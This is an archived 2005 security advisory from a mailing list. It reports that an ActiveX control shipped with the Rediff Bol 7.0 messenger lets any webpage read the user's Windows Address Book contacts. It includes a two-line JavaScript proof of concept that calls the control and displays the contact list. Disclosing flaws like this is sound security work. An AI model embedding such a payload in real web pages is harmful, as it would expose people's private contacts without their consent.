lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20050904075739.36354.qmail@web8508.mail.in.yahoo.com>
Date: Sun Sep  4 14:30:11 2005
From: viper31337 at yahoo.co.in (Gregory R. Panakkal)
Subject: Rediff Bol 7.0  WAB Contacts

Rediff Bol 7.0  WAB Contacts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Affected Program : Rediff Bol 7.0
It is a popular instant messenger from Rediff.com

Related URL : http://messenger.rediff.com/newbol/

Discovered by : Gregory R. Panakkal

Vulnerability Description :

Rediff Bol's ActiveX control (Fetch.FetchContact.1 /
Fetch.dll) allows a webpage
to read the user's Windows Address Book (WAB)
contacts. The method "FullAddressBook" 

returns the WAB contact list in XML format


Proof Of Concept:

[script]
var Obj = new ActiveXObject("Fetch.FetchContact.1");
alert(Obj.FullAddressBook(0,"","",""));
[/script]

Online Demo:
http://www.infogreg.com/security/im/rediff-bol-7-exposes-wab.html


rgds,
Gregory R. Panakkal
http://www.infogreg.com/




	

	
		
__________________________________________________________ 
Yahoo! India Matrimony: Find your partner online. Go to http://yahoo.shaadi.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ